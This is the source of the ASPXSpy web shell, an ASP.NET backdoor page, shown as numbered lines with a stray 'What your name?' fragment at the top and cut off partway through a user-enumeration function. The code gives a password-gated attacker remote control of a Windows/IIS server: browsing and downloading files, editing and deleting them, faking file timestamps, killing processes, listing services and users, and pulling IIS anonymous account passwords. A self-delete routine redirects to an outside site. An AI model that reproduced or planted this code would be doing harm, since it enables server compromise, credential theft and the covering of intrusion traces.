config

1. What your name?<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>
2. <%@ import Namespace="System.IO"%>
3. <%@ import Namespace="System.Diagnostics"%>
4. <%@ import Namespace="System.Data"%>
5. <%@ import Namespace="System.Management"%>
6. <%@ import Namespace="System.Data.OleDb"%>
7. <%@ import Namespace="Microsoft.Win32"%>
8. <%@ import Namespace="System.Net.Sockets" %>
9. <%@ import Namespace="System.Net" %>
10. <%@ import Namespace="System.Runtime.InteropServices"%>
11. <%@ import Namespace="System.DirectoryServices"%>
12. <%@ import Namespace="System.ServiceProcess"%>
13. <%@ import Namespace="System.Text.RegularExpressions"%>
14. <%@ Import Namespace="System.Threading"%>
15. <%@ Import Namespace="System.Data.SqlClient"%>
16. <%@ import Namespace="Microsoft.VisualBasic"%>
17. <%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
18. <%@ Assembly Name="System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
19. <%@ Assembly Name="System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
20. <%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%>
21. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
22. <script runat="server">
23. /*
24.  
25. */
26. public string Password="62c39211448bd77c7784ee5262e294ac";
27. public string vbhLn="ASPXSpy";
28. public int TdgGU=1;
29. protected OleDbConnection Dtdr=new OleDbConnection();
30. protected OleDbCommand Kkvb=new OleDbCommand();
31. public NetworkStream NS=null;
32. public NetworkStream NS1=null;
33. TcpClient tcp=new TcpClient();
34. TcpClient zvxm=new TcpClient();
35. ArrayList IVc=new ArrayList();
36. protected void Page_load(object sender,EventArgs e)
37. {
38. YFcNP(this);
39. fhAEn();
40. if (!pdo())
41. {
42. return;
43. }
44. if(IsPostBack)
45. {
46. string tkI=Request["__EVENTTARGET"];
47. string VqV=Request["__File"];
48. if(tkI!="")
49. {
50. switch(tkI)
51. {
52. case "Bin_Parent":
53. krIR(Ebgw(VqV));
54. break;
55. case "Bin_Listdir":
56. krIR(Ebgw(VqV));
57. break;
58. case "kRXgt":
59. kRXgt(Ebgw(VqV));
60. break;
61. case "Bin_Createfile":
62. gLKc(VqV);
63. break;
64. case "Bin_Editfile":
65. gLKc(VqV);
66. break;
67. case "Bin_Createdir":
68. stNPw(VqV);
69. break;
70. case "cYAl":
71. cYAl(VqV);
72. break;
73. case "ksGR":
74. ksGR(Ebgw(VqV));
75. break;
76. case "SJv":
77. SJv(VqV);
78. break;
79. case "Bin_Regread":
80. tpRQ(Ebgw(VqV));
81. break;
82. case "hae":
83. hae();
84. break;
85. case "urJG":
86. urJG(VqV);
87. break;
88. }
89. if(tkI.StartsWith("dAJTD"))
90. {
91. dAJTD(Ebgw(tkI.Replace("dAJTD","")),VqV);
92. }
93. else if(tkI.StartsWith("Tlvz"))
94. {
95. Tlvz(Ebgw(tkI.Replace("Tlvz","")),VqV);
96. }
97. else if(tkI.StartsWith("Bin_CFile"))
98. {
99. YByN(Ebgw(tkI.Replace("Bin_CFile","")),VqV);
100. }
101. }
102. }
103. else
104. {
105. PBZw();
106. }
107. }
108. public bool pdo()
109. {
110. if(Request.Cookies[vbhLn]==null)
111. {
112. tZSx();
113. return false;
114. }
115. else
116. {
117. if (Request.Cookies[vbhLn].Value != Password)
118. {
119. tZSx();
120. return false;
121. }
122. else
123. {
124. return true;
125. }
126. }
127. }
128. public void tZSx()
129. {
130. ljtzC.Visible=true;
131. ZVS.Visible=false;
132. }
133. protected void YKpI(object sender,EventArgs e)
134. {
135. Session.Abandon();
136. Response.Cookies.Add(new HttpCookie(vbhLn,null));
137. tZSx();
138. }
139. public void PBZw()
140. {
141. ZVS.Visible=true;
142. ljtzC.Visible=false;
143. Bin_Button_CreateFile.Attributes["onClick"]="var filename=prompt('Please input the file name:','');if(filename){Bin_PostBack('Bin_Createfile',filename);}";
144. Bin_Button_CreateDir.Attributes["onClick"]="var filename=prompt('Please input the directory name:','');if(filename){Bin_PostBack('Bin_Createdir',filename);}";
145. Bin_Button_KillMe.Attributes["onClick"]="if(confirm('Are you sure delete ASPXSPY?')){Bin_PostBack('hae','');};";
146. Bin_Span_Sname.InnerHtml=Request.ServerVariables["LOCAL_ADDR"]+":"+Request.ServerVariables["SERVER_PORT"]+"("+Request.ServerVariables["SERVER_NAME"]+")";
147. Bin_Span_FrameVersion.InnerHtml="Framework Ver : "+Environment.Version.ToString();
148. if (AXSbb.Value==string.Empty)
149. {
150. AXSbb.Value=OElM(Server.MapPath("."));
151. }
152. Bin_H2_Title.InnerText="File Manager >>";
153. krIR(AXSbb.Value);
154. }
155. public void fhAEn()
156. {
157. try
158. {
159. string[] YRgt=Directory.GetLogicalDrives();
160. for(int i=0;i<YRgt.Length;i++)
161. {
162. Control c=ParseControl(" <asp:LinkButton Text='"+mFvj(YRgt[i])+"' ID=\"Bin_Button_Driv"+i+"\" runat='server' commandargument= '"+YRgt[i]+"'/> | ");
163. Bin_Span_Drv.Controls.Add(c);
164. LinkButton nxeDR=(LinkButton)Page.FindControl("Bin_Button_Driv"+i);
165. nxeDR.Command+=new CommandEventHandler(this.iVk);
166. }
167. }catch(Exception ex){}
168. }
169. public string OElM(string path)
170. {
171. if(path.Substring(path.Length-1,1)!=@"\")
172. {
173. path=path+@"\";
174. }
175. return path;
176. }
177. public string nrrx(string path)
178. {
179. char[] trim={'\\'};
180. if(path.Substring(path.Length-1,1)==@"\")
181. {
182. path=path.TrimEnd(trim);
183. }
184. return path;
185. }
186. [DllImport("kernel32.dll",EntryPoint="GetDriveTypeA")]
187. public static extern int OMZP(string nDrive);
188. public string mFvj(string instr)
189. {
190. string EuXD=string.Empty;
191. int num=OMZP(instr);
192. switch(num)
193. {
194. case 1:
195. EuXD="Unknow("+instr+")";
196. break;
197. case 2:
198. EuXD="Removable("+instr+")";
199. break;
200. case 3:
201. EuXD="Fixed("+instr+")";
202. break;
203. case 4:
204. EuXD="Network("+instr+")";
205. break;
206. case 5:
207. EuXD="CDRom("+instr+")";
208. break;
209. case 6:
210. EuXD="RAM Disk("+instr+")";
211. break;
212. }
213. return EuXD.Replace(@"\","");
214. }
215. public string MVVJ(string instr)
216. {
217. byte[] tmp=Encoding.Default.GetBytes(instr);
218. return Convert.ToBase64String(tmp);
219. }
220. public string Ebgw(string instr)
221. {
222. byte[] tmp=Convert.FromBase64String(instr);
223. return Encoding.Default.GetString(tmp);
224. }
225. public void krIR(string path)
226. {
227. WICxe();
228. CzfO.Visible=true;
229. Bin_H2_Title.InnerText="File Manager >>";
230. AXSbb.Value=OElM(path);
231. DirectoryInfo GQMM=new DirectoryInfo(path);
232. if(Directory.GetParent(nrrx(path))!=null)
233. {
234. string bg=OKM();
235. TableRow p=new TableRow();
236. for(int i=1;i<6;i++)
237. {
238. TableCell pc=new TableCell();
239. if(i==1)
240. {
241. pc.Width=Unit.Parse("2%");
242. pc.Text="0";
243. p.CssClass=bg;
244. }
245. if(i==2)
246. {
247. pc.Text="<a href=\"javascript:Bin_PostBack('Bin_Parent','"+MVVJ(Directory.GetParent(nrrx(path)).ToString())+"')\">Parent Directory</a>";
248. }
249. p.Cells.Add(pc);
250. UGzP.Rows.Add(p);
251. }
252. }
253. try
254. {
255. int vLlH=0;
256. foreach(DirectoryInfo Bin_folder in GQMM.GetDirectories())
257. {
258. string bg=OKM();
259. vLlH++;
260. TableRow tr=new TableRow();
261. TableCell tc=new TableCell();
262. tc.Width=Unit.Parse("2%");
263. tc.Text="0";
264. tr.Attributes["onmouseover"]="this.className='focus';";
265. tr.CssClass=bg;
266. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
267. tr.Cells.Add(tc);
268. TableCell HczyN=new TableCell();
269. HczyN.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(AXSbb.Value+Bin_folder.Name)+"')\">"+Bin_folder.Name+"</a>";
270. tr.Cells.Add(HczyN);
271. TableCell LYZK=new TableCell();
272. LYZK.Text=Bin_folder.LastWriteTimeUtc.ToString("yyyy-MM-dd hh:mm:ss");
273. tr.Cells.Add(LYZK);
274. UGzP.Rows.Add(tr);
275. TableCell ERUL=new TableCell();
276. ERUL.Text="--";
277. tr.Cells.Add(ERUL);
278. UGzP.Rows.Add(tr);
279. TableCell ZGKh=new TableCell();
280. ZGKh.Text="<a href=\"javascript:if(confirm('Are you sure will delete it ?\\n\\nIf non-empty directory,will be delete all the files.')){Bin_PostBack('kRXgt','"+MVVJ(AXSbb.Value+Bin_folder.Name)+"')};\">Del</a> | <a href='#' onclick=\"var filename=prompt('Please input the new folder name:','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_folder.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('dAJTD"+MVVJ(AXSbb.Value+Bin_folder.Name)+"',filename);} \">Rename</a>";
281. tr.Cells.Add(ZGKh);
282. UGzP.Rows.Add(tr);
283. }
284. TableRow cKVA=new TableRow();
285. cKVA.Attributes["style"]="border-top:1px solid #fff;border-bottom:1px solid #ddd;";
286. cKVA.Attributes["bgcolor"]="#dddddd";
287. TableCell JlmW=new TableCell();
288. JlmW.Attributes["colspan"]="6" ;
289. JlmW.Attributes["height"]="5";
290. cKVA.Cells.Add(JlmW);
291. UGzP.Rows.Add(cKVA);
292. int aYRwo=0;
293. foreach(FileInfo Bin_Files in GQMM.GetFiles())
294. {
295. aYRwo++;
296. string gb=OKM();
297. TableRow tr=new TableRow();
298. TableCell tc=new TableCell();
299. tc.Width=Unit.Parse("2%");
300. tc.Text="<input type=\"checkbox\" value=\"0\" name=\""+MVVJ(Bin_Files.Name)+"\">";
301. tr.Attributes["onmouseover"]="this.className='focus';";
302. tr.CssClass=gb;
303. tr.Attributes["onmouseout"]="this.className='"+gb+"';";
304. tr.Cells.Add(tc);
305. TableCell filename=new TableCell();
306. if(Bin_Files.FullName.StartsWith(Request.PhysicalApplicationPath))
307. {
308. string url=Request.Url.ToString();
309. filename.Text="<a href=\""+Bin_Files.FullName.Replace(Request.PhysicalApplicationPath,url.Substring(0,url.IndexOf('/',8)+1)).Replace("\\","/")+"\" target=\"_blank\">"+Bin_Files.Name+"</a>";
310. }
311. else
312. {
313. filename.Text=Bin_Files.Name;
314. }
315. TableCell albt=new TableCell();
316. albt.Text=Bin_Files.LastWriteTimeUtc.ToString("yyyy-MM-dd hh:mm:ss");
317. TableCell YzK=new TableCell();
318. YzK.Text=mTG(Bin_Files.Length);
319. TableCell GLpi=new TableCell();
320. GLpi.Text="<a href=\"#\" onclick=\"Bin_PostBack('ksGR','"+MVVJ(AXSbb.Value+Bin_Files.Name)+"')\">Down</a> | <a href='#' onclick=\"var filename=prompt('Please input the new path(full path):','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_Files.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('Bin_CFile"+MVVJ(AXSbb.Value+Bin_Files.Name)+"',filename);} \">Copy</a> | <a href=\"#\" onclick=\"Bin_PostBack('Bin_Editfile','"+Bin_Files.Name+"')\">Edit</a> | <a href='#' onclick=\"var filename=prompt('Please input the new file name(full path):','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_Files.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('Tlvz"+MVVJ(AXSbb.Value+Bin_Files.Name)+"',filename);} \">Rename</a> | <a href=\"#\" onclick=\"Bin_PostBack('cYAl','"+Bin_Files.Name+"')\">Time</a> ";
321. tr.Cells.Add(filename);
322. tr.Cells.Add(albt);
323. tr.Cells.Add(YzK);
324. tr.Cells.Add(GLpi);
325. UGzP.Rows.Add(tr);
326. }
327. string lgb=OKM();
328. TableRow oWam=new TableRow();
329. oWam.CssClass=lgb;
330. for(int i=1;i<4;i++)
331. {
332. TableCell lGV=new TableCell();
333. if(i==1)
334. {
335. lGV.Text="<input name=\"chkall\" value=\"on\" type=\"checkbox\" onclick=\"var ck=document.getElementsByTagName('input');for(var i=0;i<ck.length-1;i++){if(ck[i].type=='checkbox'&&ck[i].name!='chkall'){ck[i].checked=forms[0].chkall.checked;}}\"/>";
336. }
337. if(i==2)
338. {
339. lGV.Text="<a href=\"#\" Onclick=\"var d_file='';var ck=document.getElementsByTagName('input');for(var i=0;i<ck.length-1;i++){if(ck[i].checked&&ck[i].name!='chkall'){d_file+=ck[i].name+',';}};if(d_file==null || d_file==''){ return;} else {if(confirm('Are you sure delete the files ?')){Bin_PostBack('SJv',d_file)};}\">Delete selected</a>";
340. }
341. if(i==3)
342. {
343. lGV.ColumnSpan=4;
344. lGV.Style.Add("text-align","right");
345. lGV.Text=vLlH+" directories/ "+aYRwo+" files";
346. }
347. oWam.Cells.Add(lGV);
348. }
349. UGzP.Rows.Add(oWam);
350. }
351. catch(Exception error)
352. {
353. xseuB(error.Message);
354. }
355. }
356. public string OKM()
357. {
358. TdgGU++;
359. if(TdgGU % 2==0)
360. {
361. return "alt1";
362. }
363. else
364. {
365. return "alt2";
366. }
367. }
368. public void kRXgt(string qcKu)
369. {
370. try
371. {
372. Directory.Delete(qcKu,true);
373. xseuB("Directory delete new success !");
374. }
375. catch(Exception error)
376. {
377. xseuB(error.Message);
378. }
379. krIR(Directory.GetParent(qcKu).ToString());
380. }
381. public void dAJTD(string sdir,string ddir)
382. {
383. try
384. {
385. Directory.Move(sdir,ddir);
386. xseuB("Directory Renamed Success !");
387. }
388. catch(Exception error)
389. {
390. xseuB(error.Message);
391. }
392. krIR(AXSbb.Value);
393. }
394. public void Tlvz(string sfile,string dfile)
395. {
396. try
397. {
398. File.Move(sfile,dfile);
399. xseuB("File Renamed Success !");
400. }
401. catch(Exception error)
402. {
403. xseuB(error.Message);
404. }
405. krIR(AXSbb.Value);
406. }
407. public void YByN(string spath,string dpath)
408. {
409. try
410. {
411. File.Copy(spath,dpath);
412. xseuB("File Copy Success !");
413. }
414. catch(Exception error)
415. {
416. xseuB(error.Message);
417. }
418. krIR(AXSbb.Value);
419. }
420. public void stNPw(string path)
421. {
422. try
423. {
424. Directory.CreateDirectory(AXSbb.Value+path);
425. xseuB("Directory created success !");
426. }
427. catch(Exception error)
428. {
429. xseuB(error.Message);
430. }
431. krIR(AXSbb.Value);
432. }
433. public void gLKc(string path)
434. {
435. if(Request["__EVENTTARGET"]=="Bin_Editfile" || Request["__EVENTTARGET"]=="Bin_Createfile")
436. {
437. foreach(ListItem item in NdCX.Items)
438. {
439. if(item.Selected=true)
440. {
441. item.Selected=false;
442. }
443. }
444. }
445. Bin_H2_Title.InnerHtml="Create/ Edit File >>";
446. WICxe();
447. vrFA.Visible=true;
448. if(path.IndexOf(":")< 0)
449. {
450. Sqon.Value=AXSbb.Value+path;
451. }
452. else
453. {
454. Sqon.Value=path;
455. }
456. if(File.Exists(Sqon.Value))
457. {
458. StreamReader sr;
459. if(NdCX.SelectedItem.Text=="UTF-8")
460. {
461. sr=new StreamReader(Sqon.Value,Encoding.UTF8);
462. }
463. else
464. {
465. sr=new StreamReader(Sqon.Value,Encoding.Default);
466. }
467. Xgvv.InnerText=sr.ReadToEnd();
468. sr.Close();
469. }
470. else
471. {
472. Xgvv.InnerText=string.Empty;
473. }
474. }
475. public void ksGR(string path)
476. {
477. FileInfo fs=new FileInfo(path);
478. Response.Clear();
479. Page.Response.ClearHeaders();
480. Page.Response.Buffer=false;
481. this.EnableViewState=false;
482. Response.AddHeader("Content-Disposition","attachment;filename="+HttpUtility.UrlEncode(fs.Name,System.Text.Encoding.UTF8));
483. Response.AddHeader("Content-Length",fs.Length.ToString());
484. Page.Response.ContentType="application/unknown";
485. Response.WriteFile(fs.FullName);
486. Page.Response.Flush();
487. Page.Response.Close();
488. Response.End();
489. Page.Response.Clear();
490. }
491. public void SJv(string path)
492. {
493. try
494. {
495. string[] spdT=path.Split(',');
496. for(int i=0;i<spdT.Length-1;i++)
497. {
498. File.Delete(AXSbb.Value+Ebgw(spdT[i]));
499. }
500. xseuB("File Delete Success !");
501. }
502. catch(Exception error)
503. {
504. xseuB(error.Message);
505. }
506. krIR(AXSbb.Value);
507. }
508. public void hae()
509. {
510. try
511. {
512. File.Delete(Request.PhysicalPath);
513. Response.Redirect("http://www.rootkit.net.cn");
514. }
515. catch(Exception error)
516. {
517. xseuB(error.Message);
518. }
519. }
520. public void cYAl(string path)
521. {
522. Bin_H2_Title.InnerHtml="Clone file was last modified time >>";
523. WICxe();
524. zRyG.Visible=true;
525. QiFB.Value=AXSbb.Value+path;
526. lICp.Value=AXSbb.Value;
527. pWVL.Value=AXSbb.Value+path;
528. string Att=File.GetAttributes(QiFB.Value).ToString();
529. if(Att.LastIndexOf("ReadOnly")!=-1)
530. {
531. ZhWSK.Checked=true;
532. }
533. if(Att.LastIndexOf("System")!=-1)
534. {
535. SsR.Checked=true;
536. }
537. if(Att.LastIndexOf("Hidden")!=-1)
538. {
539. ccB.Checked=true;
540. }
541. if(Att.LastIndexOf("Archive")!=-1)
542. {
543. fbyZ.Checked=true;
544. }
545. yUqx.Value=File.GetCreationTimeUtc(pWVL.Value).ToString();
546. uYjw.Value=File.GetLastWriteTimeUtc(pWVL.Value).ToString();
547. aLsn.Value=File.GetLastAccessTimeUtc(pWVL.Value).ToString();
548. }
549. public static String mTG(Int64 fileSize)
550. {
551. if(fileSize<0)
552. {
553. throw new ArgumentOutOfRangeException("fileSize");
554. }
555. else if(fileSize >= 1024 * 1024 * 1024)
556. {
557. return string.Format("{0:########0.00} G",((Double)fileSize)/(1024 * 1024 * 1024));
558. }
559. else if(fileSize >= 1024 * 1024)
560. {
561. return string.Format("{0:####0.00} M",((Double)fileSize)/(1024 * 1024));
562. }
563. else if(fileSize >= 1024)
564. {
565. return string.Format("{0:####0.00} K",((Double)fileSize)/ 1024);
566. }
567. else
568. {
569. return string.Format("{0} B",fileSize);
570. }
571. }
572. private bool SGde(string sSrc)
573. {
574. Regex reg=new Regex(@"^0|[0-9]*[1-9][0-9]*$");
575. if(reg.IsMatch(sSrc))
576. {
577. return true;
578. }
579. else
580. {
581. return false;
582. }
583. }
584. public void AdCx()
585. {
586. string qcKu=string.Empty;
587. string mWGEm="IIS://localhost/W3SVC";
588. GlI.Style.Add("word-break","break-all");
589. try
590. {
591. DirectoryEntry HHzcY=new DirectoryEntry(mWGEm);
592. int fmW=0;
593. foreach(DirectoryEntry child in HHzcY.Children)
594. {
595. if(SGde(child.Name.ToString()))
596. {
597. fmW++;
598. DirectoryEntry newdir=new DirectoryEntry(mWGEm+"/"+child.Name.ToString());
599. DirectoryEntry HlyU=newdir.Children.Find("root","IIsWebVirtualDir");
600. string bg=OKM();
601. TableRow TR=new TableRow();
602. TR.Attributes["onmouseover"]="this.className='focus';";
603. TR.CssClass=bg;
604. TR.Attributes["onmouseout"]="this.className='"+bg+"';";
605. TR.Attributes["title"]="Site:"+child.Properties["ServerComment"].Value.ToString();
606. for(int i=1;i<6;i++)
607. {
608. try
609. {
610. TableCell tfit=new TableCell();
611. switch(i)
612. {case 1:
613. tfit.Text=fmW.ToString();
614. break;
615. case 2:
616. tfit.Text=HlyU.Properties["AnonymousUserName"].Value.ToString();
617. break;
618. case 3:
619. tfit.Text=HlyU.Properties["AnonymousUserPass"].Value.ToString();
620. break;
621. case 4:
622. StringBuilder sb=new StringBuilder();
623. PropertyValueCollection pc=child.Properties["ServerBindings"];
624. for (int j=0; j < pc.Count; j++)
625. {
626. sb.Append(pc[j].ToString()+"<br>");
627. }
628. tfit.Text=sb.ToString().Substring(0,sb.ToString().Length-4);
629. break;
630. case 5:
631. tfit.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(HlyU.Properties["Path"].Value.ToString())+"')\">"+HlyU.Properties["Path"].Value.ToString()+"</a>";
632. break;
633. }
634. TR.Cells.Add(tfit);
635. }
636. catch (Exception ex)
637. {
638. xseuB(ex.Message);
639. continue;
640. }
641. }
642. GlI.Controls.Add(TR);
643. }
644. }
645. }
646. catch(Exception ex)
647. {
648. xseuB(ex.Message);
649. }
650. }
651. public ManagementObjectCollection PhQTd(string query)
652. {
653. ManagementObjectSearcher QS=new ManagementObjectSearcher(new SelectQuery(query));
654. return QS.Get();
655. }
656. public DataTable cCf(string query)
657. {
658. DataTable dt=new DataTable();
659. int i=0;
660. ManagementObjectSearcher QS=new ManagementObjectSearcher(new SelectQuery(query));
661. try
662. {
663. foreach(ManagementObject m in QS.Get())
664. {
665. DataRow dr=dt.NewRow();
666. PropertyDataCollection.PropertyDataEnumerator oEnum;
667. oEnum=(m.Properties.GetEnumerator()as PropertyDataCollection.PropertyDataEnumerator);
668. while(oEnum.MoveNext())
669. {
670. PropertyData DRU=(PropertyData)oEnum.Current;
671. if(dt.Columns.IndexOf(DRU.Name)==-1)
672. {
673. dt.Columns.Add(DRU.Name);
674. dt.Columns[dt.Columns.Count-1].DefaultValue="";
675. }
676. if(m[DRU.Name]!=null)
677. {
678. dr[DRU.Name]=m[DRU.Name].ToString();
679. }
680. else
681. {
682. dr[DRU.Name]=string.Empty;
683. }
684. }
685. dt.Rows.Add(dr);
686. }
687. }
688. catch(Exception error)
689. {
690. }
691. return dt;
692. }
693. public void YUw()
694. {
695. try
696. {
697. Bin_H2_Title.InnerText="Process >>";
698. WICxe();
699. DCbS.Visible=true;
700. int UEbTI=0;
701. Process[] p=Process.GetProcesses();
702. foreach(Process sp in p)
703. {
704. UEbTI++;
705. string bg=OKM();
706. TableRow tr=new TableRow();
707. tr.Attributes["onmouseover"]="this.className='focus';";
708. tr.CssClass=bg;
709. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
710. for(int i=1;i<7;i++)
711. {
712. TableCell td=new TableCell();
713. if(i==1)
714. {
715. td.Width=Unit.Parse("2%");
716. td.Text=UEbTI.ToString();
717. tr.Controls.Add(td);
718. }
719. if(i==2)
720. {
721. td.Text=sp.Id.ToString();
722. tr.Controls.Add(td);
723. }
724. if(i==3)
725. {
726. td.Text=sp.ProcessName.ToString();
727. tr.Controls.Add(td);
728. }
729. if(i==4)
730. {
731. td.Text=sp.Threads.Count.ToString();
732. tr.Controls.Add(td);
733. }
734. if(i==5)
735. {
736. td.Text=sp.BasePriority.ToString();
737. tr.Controls.Add(td);
738. }
739. if(i==6)
740. {
741. td.Text="--";
742. tr.Controls.Add(td);
743. }
744. }
745. IjsL.Controls.Add(tr);
746. }
747. }
748. catch(Exception error)
749. {
750. AIz();
751. }
752. AIz();
753. }
754. public void AIz()
755. {
756. try
757. {
758. Bin_H2_Title.InnerText="Process >>";
759. WICxe();
760. DCbS.Visible=true;
761. int UEbTI=0;
762. DataTable dt=cCf("Win32_Process");
763. for(int j=0;j<dt.Rows.Count;j++)
764. {
765. UEbTI++;
766. string bg=OKM();
767. TableRow tr=new TableRow();
768. tr.Attributes["onmouseover"]="this.className='focus';";
769. tr.CssClass=bg;
770. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
771. for(int i=1;i<7;i++)
772. {
773. TableCell td=new TableCell();
774. if(i==1)
775. {
776. td.Width=Unit.Parse("2%");
777. td.Text=UEbTI.ToString();
778. tr.Controls.Add(td);
779. }
780. if(i==2)
781. {
782. td.Text=dt.Rows[j]["ProcessID"].ToString();
783. tr.Controls.Add(td);
784. }
785. if(i==3)
786. {
787. td.Text=dt.Rows[j]["Name"].ToString();
788. tr.Controls.Add(td);
789. }
790. if(i==4)
791. {
792. td.Text=dt.Rows[j]["ThreadCount"].ToString();
793. tr.Controls.Add(td);
794. }
795. if(i==5)
796. {
797. td.Text=dt.Rows[j]["Priority"].ToString();
798. tr.Controls.Add(td);
799. }
800. if(i==6)
801. {
802. if( dt.Rows[j]["CommandLine"]!=string.Empty)
803. {
804. td.Text="<a href=\"javascript:Bin_PostBack('urJG','"+dt.Rows[j]["ProcessID"].ToString()+"')\">Kill</a>";
805. }
806. else
807. {
808. td.Text="--";
809. }
810. tr.Controls.Add(td);
811. }
812. }
813. IjsL.Controls.Add(tr);
814. }
815. }
816. catch(Exception error)
817. {
818. xseuB(error.Message);
819. }
820. }
821. public void urJG(string pid)
822. {
823. try
824. {
825. foreach(ManagementObject p in PhQTd("Select * from Win32_Process Where ProcessID ='"+pid+"'"))
826. {
827. p.InvokeMethod("Terminate",null);
828. p.Dispose();
829. }
830. xseuB("Process Kill Success !");
831. }
832. catch(Exception error)
833. {
834. xseuB(error.Message);
835. }
836. AIz();
837. }
838. public void oHpF()
839. {
840. try
841. {
842. Bin_H2_Title.InnerText="Services >>";
843. WICxe();
844. iQxm.Visible=true;
845. int UEbTI=0;
846. ServiceController[] kQmRu=System.ServiceProcess.ServiceController.GetServices();
847. for(int i=0;i<kQmRu.Length;i++)
848. {
849. UEbTI++;
850. string bg=OKM();
851. TableRow tr=new TableRow();
852. tr.Attributes["onmouseover"]="this.className='focus';";
853. tr.CssClass=bg;
854. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
855. for(int b=1;b<7;b++)
856. {
857. TableCell td=new TableCell();
858. if(b==1)
859. {
860. td.Width=Unit.Parse("2%");
861. td.Text=UEbTI.ToString();
862. tr.Controls.Add(td);
863. }
864. if(b==2)
865. {
866. td.Text="null";
867. tr.Controls.Add(td);
868. }
869. if(b==3)
870. {
871. td.Text=kQmRu[i].ServiceName.ToString();
872. tr.Controls.Add(td);
873. }
874. if(b==4)
875. {
876. td.Text="";
877. tr.Controls.Add(td);
878. }
879. if(b==5)
880. {
881. string kOIo=kQmRu[i].Status.ToString();
882. if(kOIo=="Running")
883. {
884. td.Text="<font color=green>"+kOIo+"</font>";
885. }
886. else
887. {
888. td.Text="<font color=red>"+kOIo+"</font>";
889. }
890. tr.Controls.Add(td);
891. }
892. if(b==6)
893. {
894. td.Text="";
895. tr.Controls.Add(td);
896. }
897. }
898. vHCs.Controls.Add(tr);
899. }
900. }
901. catch(Exception error)
902. {
903. xseuB(error.Message);
904. }
905. }
906. public void tZRH()
907. {
908. try
909. {
910. Bin_H2_Title.InnerText="Services >>";
911. WICxe();
912. iQxm.Visible=true;
913. int UEbTI=0;
914. DataTable dt=cCf("Win32_Service");
915. for(int j=0;j<dt.Rows.Count;j++)
916. {
917. UEbTI++;
918. string bg=OKM();
919. TableRow tr=new TableRow();
920. tr.Attributes["onmouseover"]="this.className='focus';";
921. tr.CssClass=bg;
922. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
923. tr.Attributes["title"]=dt.Rows[j]["Description"].ToString();
924. for(int i=1;i<7;i++)
925. {
926. TableCell td=new TableCell();
927. if(i==1)
928. {
929. td.Width=Unit.Parse("2%");
930. td.Text=UEbTI.ToString();
931. tr.Controls.Add(td);
932. }
933. if(i==2)
934. {
935. td.Text=dt.Rows[j]["ProcessID"].ToString();
936. tr.Controls.Add(td);
937. }
938. if(i==3)
939. {
940. td.Text=dt.Rows[j]["Name"].ToString();
941. tr.Controls.Add(td);
942. }
943. if(i==4)
944. {
945. td.Text=dt.Rows[j]["PathName"].ToString();
946. tr.Controls.Add(td);
947. }
948. if(i==5)
949. {
950. string kOIo=dt.Rows[j]["State"].ToString();
951. if(kOIo=="Running")
952. {
953. td.Text="<font color=green>"+kOIo+"</font>";
954. }
955. else
956. {
957. td.Text="<font color=red>"+kOIo+"</font>";
958. }
959. tr.Controls.Add(td);
960. }
961. if(i==6)
962. {
963. td.Text=dt.Rows[j]["StartMode"].ToString();
964. tr.Controls.Add(td);
965. }
966. }
967. vHCs.Controls.Add(tr);
968. }
969. }
970. catch(Exception error)
971. {
972. oHpF();
973. }
974. }
975. public void PLd()
976. {
977. try
978. {
979. WICxe();
980. xWVQ.Visible=true;
981. Bin_H2_Title.InnerText="User Information >>";
982. DirectoryEntry TWQ=new DirectoryEntry("WinNT://"+Environment.MachineName.ToString());
983. foreach(DirectoryEntry child in TWQ.Children)
984. {
985. foreach(string name in child.Properties.PropertyNames)
986. {
987. PropertyValueCollection pvc=child.Properties[name];
988. int c=pvc.Count;
989. for(int i=0;i<c;i++)
990. {
991. if(name!="objectSid" && name!="Parameters" && name!="LoginHours")
992. {
993. string bg=OKM();
994. TableRow tr=new TableRow();
995. tr.Attributes["onmouseover"]="this.className='focus';";
996. tr.CssClass=bg;
997. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
998. TableCell td=new TableCell();
999. td.Text=name;
1000. tr.Controls.Add(td);
1001. TableCell td1=new TableCell();
1002. td1.Text=pvc[i].ToString();
1003. tr.Controls.Add(td1);
1004. VPa.Controls.Add(tr);
1005. }
1006. }
1007. }
1008. TableRow trn=new TableRow();
1009. for(int x=1;x<3;x++)
1010. {
1011. TableCell tdn=new TableCell();
1012. tdn.Attributes["style"]="height:2px;background-color:#bbbbbb;";
1013. trn.Controls.Add(tdn);
1014. VPa.Controls.Add(trn);
1015. }
1016. }
1017. }
1018. catch(Exception error)
1019. {
1020. xseuB(error.Message);
1021. }
1022. }
1023. public void iLVUT()
1024. {
1025. try
1026. {
1027. WICxe();
1028. xWVQ.Visible=true;
1029. Bin_H2_Title.InnerText="User Information >>";
1030. DataTable user=cCf("Win32_UserAccount");
1031. for(int i=0;i<user.Rows.Count;i++)
1032. {
1033. for(int j=0;j<user.Columns.Count;j++)
1034. {
1035. string bg=OKM();
1036. TableRow tr=new TableRow();
1037. tr.Attributes["onmouseover"]="this.className='focus';";
1038. tr.CssClass=bg;
1039. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
1040. TableCell td=new TableCell();
1041. td.Text=user.Columns[j].ToString();
1042. tr.Controls.Add(td);
1043. TableCell td1=new TableCell();
